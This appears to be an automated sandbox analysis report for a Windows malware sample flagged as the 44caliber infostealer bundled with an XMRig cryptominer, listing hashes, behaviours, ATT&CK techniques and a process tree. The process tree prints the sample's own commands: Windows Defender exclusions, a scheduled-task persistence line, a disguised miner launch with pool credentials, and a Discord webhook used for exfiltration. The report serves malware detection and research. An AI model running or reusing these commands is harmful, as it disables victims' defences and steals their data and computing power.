44caliber | 5b3608236eb01a9812bc32ca81bf7493c374f854ba7dd40fb422a7ff8b03ed67

Analysis

max time kernel
156s
max time network
179s
platform
windows10-2004_x64
resource
win10v2004-20220310-en
submitted
20-03-2022 05:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

65119209.exe
Size

5.2MB
MD5

32c5693987d03d80ea5d7d5632769cb8
SHA1

e8c8a465e6d6912afc99bbdf90cf08363cf184e4
SHA256

5b3608236eb01a9812bc32ca81bf7493c374f854ba7dd40fb422a7ff8b03ed67
SHA512

7948d57c378ed69531ba75059af8a17e5b9c3ee256c5c742d93d9f94c4c438a4845c5df8ab672aaba4ca1b8fdeb155b57b6753e438b3fde47d0490cd8b6ff11a

Score

10^/10

44caliber xmrig miner spyware stealer

Malware Config

Extracted

Family

44caliber

https://discordapp.com/api/webhooks/934716186313240606/NIuB64dK4IPafrX9FRy2wNNRrBnOxvdLjio6Ou2fEKxC9HrdYgZQcnvkOx-a4O9pNzdW

Signatures

44Caliber
An open source infostealer written in C#.
stealer 44caliber
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner Payload 3 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/4208-177-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/4208-178-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/4208-179-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig

Executes dropped EXE 5 IoCs

Processes:

KLNR.exeWARZONEHACK.exeInsidious2.exeservices64.exesihost64.exe

pid process

1484 KLNR.exe
1156 WARZONEHACK.exe
1352 Insidious2.exe
4492 services64.exe
4000 sihost64.exe

pid	process
1484	KLNR.exe
1156	WARZONEHACK.exe
1352	Insidious2.exe
4492	services64.exe
4000	sihost64.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

65119209.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	65119209.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

63 freegeoip.app
64 freegeoip.app

flow	ioc
63	freegeoip.app
64	freegeoip.app

Drops file in System32 directory 6 IoCs

Processes:

svchost.execonhost.execonhost.exe

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallService\{64E89760-4E29-4916-A728-277A21692A89}.catalogItem	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallService\{C1C55260-69B0-486B-A42E-C18F74F47F11}.catalogItem	svchost.exe
File created	C:\Windows\system32\services64.exe	conhost.exe
File opened for modification	C:\Windows\system32\services64.exe	conhost.exe
File created	C:\Windows\system32\Microsoft\Libs\sihost64.exe	conhost.exe
File created	C:\Windows\system32\Microsoft\Libs\WR64.sys	conhost.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

KLNR.exe

pid process

1484 KLNR.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

conhost.exe

description pid process target process

PID 4916 set thread context of 4208 4916 conhost.exe svchost.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

804 4208 WerFault.exe svchost.exe
5068 4208 WerFault.exe svchost.exe

pid	process
1484	KLNR.exe

description	pid	process	target process
PID 4916 set thread context of 4208	4916	conhost.exe	svchost.exe

pid	pid_target	process	target process
804	4208	WerFault.exe	svchost.exe
5068	4208	WerFault.exe	svchost.exe

Checks processor information in registry 2 TTPs 5 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Insidious2.exesvchost.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Insidious2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Insidious2.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	svchost.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

4112 schtasks.exe

pid	process
4112	schtasks.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

svchost.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	svchost.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

Processes:

Insidious2.execonhost.exepowershell.exepowershell.execonhost.exepowershell.exepowershell.exe

pid	process
1352	Insidious2.exe
1352	Insidious2.exe
1352	Insidious2.exe
3928	conhost.exe
3784	powershell.exe
3784	powershell.exe
4136	powershell.exe
4136	powershell.exe
1352	Insidious2.exe
4916	conhost.exe
4916	conhost.exe
4916	conhost.exe
5072	powershell.exe
5072	powershell.exe
5072	powershell.exe
4204	powershell.exe
4204	powershell.exe
4204	powershell.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

Insidious2.execonhost.exepowershell.exepowershell.execonhost.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1352	Insidious2.exe
Token: SeDebugPrivilege	3928	conhost.exe
Token: SeDebugPrivilege	3784	powershell.exe
Token: SeDebugPrivilege	4136	powershell.exe
Token: SeDebugPrivilege	4916	conhost.exe
Token: SeDebugPrivilege	5072	powershell.exe
Token: SeDebugPrivilege	4204	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

KLNR.exe

pid process

1484 KLNR.exe

pid	process
1484	KLNR.exe

Suspicious use of WriteProcessMemory 58 IoCs

Processes:

65119209.exeWARZONEHACK.exeKLNR.exefondue.execonhost.execmd.execmd.execmd.exeservices64.execonhost.execmd.exesihost64.exe

description	pid	process	target process
PID 3900 wrote to memory of 1484	3900	65119209.exe	KLNR.exe
PID 3900 wrote to memory of 1484	3900	65119209.exe	KLNR.exe
PID 3900 wrote to memory of 1484	3900	65119209.exe	KLNR.exe
PID 3900 wrote to memory of 1156	3900	65119209.exe	WARZONEHACK.exe
PID 3900 wrote to memory of 1156	3900	65119209.exe	WARZONEHACK.exe
PID 3900 wrote to memory of 1352	3900	65119209.exe	Insidious2.exe
PID 3900 wrote to memory of 1352	3900	65119209.exe	Insidious2.exe
PID 1156 wrote to memory of 3928	1156	WARZONEHACK.exe	conhost.exe
PID 1156 wrote to memory of 3928	1156	WARZONEHACK.exe	conhost.exe
PID 1156 wrote to memory of 3928	1156	WARZONEHACK.exe	conhost.exe
PID 1484 wrote to memory of 2472	1484	KLNR.exe	fondue.exe
PID 1484 wrote to memory of 2472	1484	KLNR.exe	fondue.exe
PID 1484 wrote to memory of 2472	1484	KLNR.exe	fondue.exe
PID 2472 wrote to memory of 2416	2472	fondue.exe	FonDUE.EXE
PID 2472 wrote to memory of 2416	2472	fondue.exe	FonDUE.EXE
PID 3928 wrote to memory of 2324	3928	conhost.exe	cmd.exe
PID 3928 wrote to memory of 2324	3928	conhost.exe	cmd.exe
PID 2324 wrote to memory of 3784	2324	cmd.exe	powershell.exe
PID 2324 wrote to memory of 3784	2324	cmd.exe	powershell.exe
PID 3928 wrote to memory of 1756	3928	conhost.exe	cmd.exe
PID 3928 wrote to memory of 1756	3928	conhost.exe	cmd.exe
PID 1756 wrote to memory of 4112	1756	cmd.exe	schtasks.exe
PID 1756 wrote to memory of 4112	1756	cmd.exe	schtasks.exe
PID 2324 wrote to memory of 4136	2324	cmd.exe	powershell.exe
PID 2324 wrote to memory of 4136	2324	cmd.exe	powershell.exe
PID 3928 wrote to memory of 4436	3928	conhost.exe	cmd.exe
PID 3928 wrote to memory of 4436	3928	conhost.exe	cmd.exe
PID 4436 wrote to memory of 4492	4436	cmd.exe	services64.exe
PID 4436 wrote to memory of 4492	4436	cmd.exe	services64.exe
PID 4492 wrote to memory of 4916	4492	services64.exe	conhost.exe
PID 4492 wrote to memory of 4916	4492	services64.exe	conhost.exe
PID 4492 wrote to memory of 4916	4492	services64.exe	conhost.exe
PID 4916 wrote to memory of 5016	4916	conhost.exe	cmd.exe
PID 4916 wrote to memory of 5016	4916	conhost.exe	cmd.exe
PID 5016 wrote to memory of 5072	5016	cmd.exe	powershell.exe
PID 5016 wrote to memory of 5072	5016	cmd.exe	powershell.exe
PID 4916 wrote to memory of 4000	4916	conhost.exe	sihost64.exe
PID 4916 wrote to memory of 4000	4916	conhost.exe	sihost64.exe
PID 4916 wrote to memory of 4208	4916	conhost.exe	svchost.exe
PID 4916 wrote to memory of 4208	4916	conhost.exe	svchost.exe
PID 4916 wrote to memory of 4208	4916	conhost.exe	svchost.exe
PID 4916 wrote to memory of 4208	4916	conhost.exe	svchost.exe
PID 4916 wrote to memory of 4208	4916	conhost.exe	svchost.exe
PID 4916 wrote to memory of 4208	4916	conhost.exe	svchost.exe
PID 4916 wrote to memory of 4208	4916	conhost.exe	svchost.exe
PID 4916 wrote to memory of 4208	4916	conhost.exe	svchost.exe
PID 4916 wrote to memory of 4208	4916	conhost.exe	svchost.exe
PID 4916 wrote to memory of 4208	4916	conhost.exe	svchost.exe
PID 4916 wrote to memory of 4208	4916	conhost.exe	svchost.exe
PID 4916 wrote to memory of 4208	4916	conhost.exe	svchost.exe
PID 4916 wrote to memory of 4208	4916	conhost.exe	svchost.exe
PID 4916 wrote to memory of 4208	4916	conhost.exe	svchost.exe
PID 4916 wrote to memory of 4208	4916	conhost.exe	svchost.exe
PID 5016 wrote to memory of 4204	5016	cmd.exe	powershell.exe
PID 5016 wrote to memory of 4204	5016	cmd.exe	powershell.exe
PID 4000 wrote to memory of 4452	4000	sihost64.exe	conhost.exe
PID 4000 wrote to memory of 4452	4000	sihost64.exe	conhost.exe
PID 4000 wrote to memory of 4452	4000	sihost64.exe	conhost.exe

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p
1⤵
- Drops file in System32 directory
- Checks processor information in registry
- Enumerates system info in registry
PID:1768

C:\Users\Admin\AppData\Local\Temp\65119209.exe
"C:\Users\Admin\AppData\Local\Temp\65119209.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3900

C:\Users\Admin\AppData\Local\Temp\KLNR.exe
"C:\Users\Admin\AppData\Local\Temp\KLNR.exe"
2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1484

C:\Windows\SysWOW64\fondue.exe
"C:\Windows\system32\fondue.exe" /enable-feature:NetFx3 /caller-name:mscoreei.dll
3⤵
- Suspicious use of WriteProcessMemory
PID:2472

C:\Windows\system32\FonDUE.EXE
"C:\Windows\sysnative\FonDUE.EXE" /enable-feature:NetFx3 /caller-name:mscoreei.dll
4⤵
PID:2416

C:\Users\Admin\AppData\Local\Temp\WARZONEHACK.exe
"C:\Users\Admin\AppData\Local\Temp\WARZONEHACK.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1156

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\WARZONEHACK.exe"
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3928

C:\Windows\System32\cmd.exe
"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
4⤵
- Suspicious use of WriteProcessMemory
PID:2324

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3784

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4136

C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:1756

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
5⤵
- Creates scheduled task(s)
PID:4112

C:\Windows\System32\cmd.exe
"cmd" cmd /c "C:\Windows\system32\services64.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:4436

C:\Windows\system32\services64.exe
C:\Windows\system32\services64.exe
5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4492

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"
6⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4916

C:\Windows\System32\cmd.exe
"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
7⤵
- Suspicious use of WriteProcessMemory
PID:5016

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5072

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4204

C:\Windows\system32\Microsoft\Libs\sihost64.exe
"C:\Windows\system32\Microsoft\Libs\sihost64.exe"
7⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4000

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "/sihost64"
8⤵
PID:4452

C:\Windows\System32\svchost.exe
C:\Windows/System32\svchost.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6238470 --pass=WarzoneHACK --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth
7⤵
PID:4208

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4208 -s 292
8⤵
- Program crash
PID:804

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4208 -s 300
8⤵
- Program crash
PID:5068

C:\Users\Admin\AppData\Local\Temp\Insidious2.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious2.exe"
2⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1352

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 468 -p 4208 -ip 4208
1⤵
PID:768

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 464 -p 4208 -ip 4208
1⤵
PID:4960

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
MD5
b245679121623b152bea5562c173ba11

SHA1
47cb7fc4cf67e29a87016a7308cdb8b1b4dc8e3d

SHA256
73d84fd03e38f1bbf8b2218f8a454f0879051855252fc76b63f20f46e7fd877f

SHA512
75e46843b1eafcc7dc4362630838895b7f399e57662a12bf0305a912c8e726b02e0a760b1b97a2c262b2d05fdb944b9ed81c338ad93e5eb5cb57bc651602e42c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
a8e8360d573a4ff072dcc6f09d992c88

SHA1
3446774433ceaf0b400073914facab11b98b6807

SHA256
bf5e284e8f95122bf75ead61c7e2b40f55c96742b05330b5b1cb7915991df13b

SHA512
4ee5167643d82082f57c42616007ef9be57f43f9731921bdf7bca611a914724ad94072d3c8f5b130fa54129e5328ccdebf37ba74339c37deb53e79df5cdf0dbe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
60043e15d97bc9bf466a229c31d59463

SHA1
0ffdf799c4af5055caf6c5e6e20a7757c903af83

SHA256
d57675fec62cbf5ec9110a93b81ed55411830ef22e1719196632bdd3fca0c564

SHA512
47dde4c7e36ae73798d57f57d4e7ac7ca164297c14330911d50fcafa96b3b6211ccbb56b8cdc546214885ed99bdaa07b7a4aef62cd9e63d693ed7f6052541670

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
ce4540390cc4841c8973eb5a3e9f4f7d

SHA1
2293f30a6f4c9538bc5b06606c10a50ab4ecef8e

SHA256
e834e1da338b9644d538cefd70176768816da2556939c1255d386931bd085105

SHA512
2a3e466cb5a81d2b65256053b768a98321eb3e65ff46353eefc9864f14a391748116f050e7482ddd73a51575bf0a6fc5c673023dade62dbd8b174442bae1cc6b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Insidious2.exe
MD5
198458bfe3e5de2eb6737beb2d54c292

SHA1
59785684874f6b45205db1f96268593c97485dfe

SHA256
d8657c28223f4e125ba12b4cc56dac08f48e5ef24c7e295f640f281ae456bfca

SHA512
7b10151a06424279cd676f78a61fb0245241fe795b2adb6a930bd331686d4a7843f0abd101c339a3f2c2ec341182b19f47f8e8ab1aaa41338a30d03ecbea5842

Download Submit
C:\Users\Admin\AppData\Local\Temp\Insidious2.exe
MD5
198458bfe3e5de2eb6737beb2d54c292

SHA1
59785684874f6b45205db1f96268593c97485dfe

SHA256
d8657c28223f4e125ba12b4cc56dac08f48e5ef24c7e295f640f281ae456bfca

SHA512
7b10151a06424279cd676f78a61fb0245241fe795b2adb6a930bd331686d4a7843f0abd101c339a3f2c2ec341182b19f47f8e8ab1aaa41338a30d03ecbea5842

Download Submit
C:\Users\Admin\AppData\Local\Temp\KLNR.exe
MD5
8563f76405eb62c0e2a62f57992cb413

SHA1
5f7ff11c5f7be4c15fe6a256f4712e6f98dbd918

SHA256
a9021056e13fa4900943cab8c13718e9b82a55c6605624acc89539d5f7446838

SHA512
e9ba6c5b44eb679bac303dcefb47196cc606a235269da7f58fa352f1b28c3edd6190311a8d79391d81bb71264f55650334edfb78f05a7bdaeee2b220b868b823

Download Submit
C:\Users\Admin\AppData\Local\Temp\KLNR.exe
MD5
8563f76405eb62c0e2a62f57992cb413

SHA1
5f7ff11c5f7be4c15fe6a256f4712e6f98dbd918

SHA256
a9021056e13fa4900943cab8c13718e9b82a55c6605624acc89539d5f7446838

SHA512
e9ba6c5b44eb679bac303dcefb47196cc606a235269da7f58fa352f1b28c3edd6190311a8d79391d81bb71264f55650334edfb78f05a7bdaeee2b220b868b823

Download Submit
C:\Users\Admin\AppData\Local\Temp\WARZONEHACK.exe
MD5
e066cd70ab7e9dc95320051773a5d8a9

SHA1
51692557ac7c4e99065c320557c341229481cfe4

SHA256
22be3ee1348830dcc0e1e86347422b9ab0ae5ce0523bf6f312566051a163d79e

SHA512
b0fa1a69780f2549af4aa91ec04377ec32ccb80481b1e63e3a99179d2b55d96704a45142b3a3fd374b3aba2f279fd1d5f60d5242e14b07d1f6494e4816525cdb

Download Submit
C:\Users\Admin\AppData\Local\Temp\WARZONEHACK.exe
MD5
e066cd70ab7e9dc95320051773a5d8a9

SHA1
51692557ac7c4e99065c320557c341229481cfe4

SHA256
22be3ee1348830dcc0e1e86347422b9ab0ae5ce0523bf6f312566051a163d79e

SHA512
b0fa1a69780f2549af4aa91ec04377ec32ccb80481b1e63e3a99179d2b55d96704a45142b3a3fd374b3aba2f279fd1d5f60d5242e14b07d1f6494e4816525cdb

Download Submit
C:\Windows\System32\Microsoft\Libs\sihost64.exe
MD5
3721b324b4d2c9dea6c6bc6a858fe337

SHA1
f3391c6414ed5bb89acc4ab5df2b837077a9a9c6

SHA256
fd8616ef4edbc3694ae31a87296dcb726eb9f16a0f7caa6e8ebea39a041db206

SHA512
bb3c57065b74398f194488cdc81b3562926a94053c84a0b47742ffa221dcff99cf41e8bbb3e7a390d7bfdbf5c658286d2ea12d70cad6c80cf2ee725f39364256

Download Submit
C:\Windows\System32\services64.exe
MD5
e066cd70ab7e9dc95320051773a5d8a9

SHA1
51692557ac7c4e99065c320557c341229481cfe4

SHA256
22be3ee1348830dcc0e1e86347422b9ab0ae5ce0523bf6f312566051a163d79e

SHA512
b0fa1a69780f2549af4aa91ec04377ec32ccb80481b1e63e3a99179d2b55d96704a45142b3a3fd374b3aba2f279fd1d5f60d5242e14b07d1f6494e4816525cdb

Download Submit
C:\Windows\system32\Microsoft\Libs\sihost64.exe
MD5
3721b324b4d2c9dea6c6bc6a858fe337

SHA1
f3391c6414ed5bb89acc4ab5df2b837077a9a9c6

SHA256
fd8616ef4edbc3694ae31a87296dcb726eb9f16a0f7caa6e8ebea39a041db206

SHA512
bb3c57065b74398f194488cdc81b3562926a94053c84a0b47742ffa221dcff99cf41e8bbb3e7a390d7bfdbf5c658286d2ea12d70cad6c80cf2ee725f39364256

Download Submit
C:\Windows\system32\services64.exe
MD5
e066cd70ab7e9dc95320051773a5d8a9

SHA1
51692557ac7c4e99065c320557c341229481cfe4

SHA256
22be3ee1348830dcc0e1e86347422b9ab0ae5ce0523bf6f312566051a163d79e

SHA512
b0fa1a69780f2549af4aa91ec04377ec32ccb80481b1e63e3a99179d2b55d96704a45142b3a3fd374b3aba2f279fd1d5f60d5242e14b07d1f6494e4816525cdb

Download Submit
memory/1352-143-0x00000000022F0000-0x00000000022F2000-memory.dmp

Filesize
8KB

Download
memory/1352-142-0x00007FFC045D0000-0x00007FFC05091000-memory.dmp

Filesize
10.8MB

Download
memory/1352-141-0x0000000000380000-0x00000000003CA000-memory.dmp

Filesize
296KB

Download
memory/3784-151-0x00000219E1940000-0x00000219E1942000-memory.dmp

Filesize
8KB

Download
memory/3784-150-0x00007FFC045D0000-0x00007FFC05091000-memory.dmp

Filesize
10.8MB

Download
memory/3784-152-0x00000219E1943000-0x00000219E1945000-memory.dmp

Filesize
8KB

Download
memory/3784-153-0x00000219E1900000-0x00000219E1922000-memory.dmp

Filesize
136KB

Download
memory/3784-154-0x00000219E1946000-0x00000219E1948000-memory.dmp

Filesize
8KB

Download
memory/3900-134-0x0000000000400000-0x000000000093C000-memory.dmp

Filesize
5.2MB

Download
memory/3928-148-0x0000029E99753000-0x0000029E99755000-memory.dmp

Filesize
8KB

Download
memory/3928-144-0x0000029EFCBD0000-0x0000029EFCDF1000-memory.dmp

Filesize
2.1MB

Download
memory/3928-145-0x00007FFC045D0000-0x00007FFC05091000-memory.dmp

Filesize
10.8MB

Download
memory/3928-146-0x0000029E99750000-0x0000029E99752000-memory.dmp

Filesize
8KB

Download
memory/3928-147-0x0000029EFEA80000-0x0000029EFEA92000-memory.dmp

Filesize
72KB

Download
memory/3928-149-0x0000029E99756000-0x0000029E99757000-memory.dmp

Filesize
4KB

Download
memory/4136-159-0x000001FAAA0F3000-0x000001FAAA0F5000-memory.dmp

Filesize
8KB

Download
memory/4136-161-0x000001FAAA0F8000-0x000001FAAA0F9000-memory.dmp

Filesize
4KB

Download
memory/4136-160-0x000001FAAA0F6000-0x000001FAAA0F8000-memory.dmp

Filesize
8KB

Download
memory/4136-158-0x000001FAAA0F0000-0x000001FAAA0F2000-memory.dmp

Filesize
8KB

Download
memory/4136-157-0x00007FFC045D0000-0x00007FFC05091000-memory.dmp

Filesize
10.8MB

Download
memory/4204-182-0x00000186D7440000-0x00000186D7442000-memory.dmp

Filesize
8KB

Download
memory/4204-181-0x00007FFC045D0000-0x00007FFC05091000-memory.dmp

Filesize
10.8MB

Download
memory/4204-184-0x00000186D7446000-0x00000186D7448000-memory.dmp

Filesize
8KB

Download
memory/4204-183-0x00000186D7443000-0x00000186D7445000-memory.dmp

Filesize
8KB

Download
memory/4208-179-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/4208-178-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/4208-177-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/4452-189-0x000002381F0E6000-0x000002381F0E7000-memory.dmp

Filesize
4KB

Download
memory/4452-185-0x00000238035A0000-0x00000238035A7000-memory.dmp

Filesize
28KB

Download
memory/4452-186-0x00007FFC045D0000-0x00007FFC05091000-memory.dmp

Filesize
10.8MB

Download
memory/4452-188-0x000002381F0E3000-0x000002381F0E5000-memory.dmp

Filesize
8KB

Download
memory/4452-187-0x000002381F0E0000-0x000002381F0E2000-memory.dmp

Filesize
8KB

Download
memory/4916-170-0x000001E764770000-0x000001E764772000-memory.dmp

Filesize
8KB

Download
memory/4916-172-0x000001E764776000-0x000001E764777000-memory.dmp

Filesize
4KB

Download
memory/4916-171-0x000001E764773000-0x000001E764775000-memory.dmp

Filesize
8KB

Download
memory/4916-169-0x00007FFC045D0000-0x00007FFC05091000-memory.dmp

Filesize
10.8MB

Download
memory/5072-176-0x00000264345B6000-0x00000264345B8000-memory.dmp

Filesize
8KB

Download
memory/5072-175-0x00000264345B3000-0x00000264345B5000-memory.dmp

Filesize
8KB

Download
memory/5072-174-0x00000264345B0000-0x00000264345B2000-memory.dmp

Filesize
8KB

Download
memory/5072-173-0x00007FFC045D0000-0x00007FFC05091000-memory.dmp

Filesize
10.8MB

Download
memory/5072-168-0x00000264345B8000-0x00000264345B9000-memory.dmp

Filesize
4KB

Download